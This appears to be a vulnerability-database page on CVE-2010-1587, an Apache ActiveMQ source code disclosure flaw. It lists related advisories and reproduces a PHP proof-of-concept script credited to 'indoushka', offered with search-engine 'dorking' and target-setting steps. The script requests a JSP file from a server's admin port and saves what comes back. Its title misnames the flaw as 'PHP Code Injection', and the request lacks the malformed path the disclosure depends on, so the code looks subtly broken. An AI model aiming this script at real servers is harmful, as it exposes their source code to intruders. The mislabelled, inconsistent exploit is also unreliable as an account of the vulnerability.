| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Security Bulletin: Security vulnerabilities in ActiveMQ 5.2.0 affect IBM Sterling B2B Integrator (CVE-2015-1830, CVE-2014-8110, CVE-2013-3060, CVE-2013-1880, CVE-2013-1879, CVE-2012-6551, CVE-2012-6092, CVE-2010-1587, CVE-2010-1244, CVE-2010-0684) | 16 Jun 201819:48 | – | ibm | |
| Apache ActiveMQ Double Slash Request Source Code Disclosure | 24 Apr 201000:00 | – | nessus | |
| CVE-2010-1587 | 22 Apr 201000:00 | – | circl | |
| CVE-2010-1587 | 28 Apr 201022:00 | – | cve | |
| CVE-2010-1587 | 28 Apr 201022:00 | – | cvelist | |
| Apache ActiveMQ Source Code Disclosure | 18 Mar 201200:00 | – | dsquare | |
| Apache ActiveMQ Sensitive Information Disclosure via the Jetty ResourceHandler | 14 May 202202:45 | – | github | |
| Apache ActiveMQ JSP Files Source Disclosure | 14 Oct 201220:36 | – | metasploit | |
| CVE-2010-1587 | 28 Apr 201022:30 | – | nvd | |
| Apache ActiveMQ Source Code Information Disclosure Vulnerability | 23 Apr 201000:00 | – | openvas |
=============================================================================================================================================
| # Title : Apache ActiveMQ 5.3.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://activemq.apache.org/components/classic/download/classic-05-03-01 |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This code is written in PHP and aims to exploit a vulnerability in Apache ActiveMQ that allows the source code of JSP files stored on the target server to be exposed.
( https://packetstorm.news/files/id/181098/ CVE-2010-1587 )
[+] save code as poc.php.
[+] Set Target : line 45
[+] USage : php poc.php
[+] PayLoad :
<?php
class ApacheActiveMQScanner {
private $target;
private $port;
private $targetUri;
public function __construct($target, $port = 8161, $targetUri = '/admin/index.jsp') {
$this->target = $target;
$this->port = $port;
$this->targetUri = $targetUri;
}
public function run() {
echo "Scanning {$this->target}:{$this->port}...\n";
$url = "http://{$this->target}:{$this->port}{$this->targetUri}";
$response = $this->sendRequest($url);
if ($response !== false && strpos($response, '<') === false) {
$this->saveFile($response);
echo "File saved successfully!\n";
} else {
echo "Failed to retrieve file.\n";
}
}
private function sendRequest($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function saveFile($contents) {
$filename = basename($this->targetUri);
file_put_contents($filename, $contents);
echo "File saved as: {$filename}\n";
}
}
$scanner = new ApacheActiveMQScanner('127.0.0.1'); // ضع عنوان الهدف هنا
$scanner->run();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation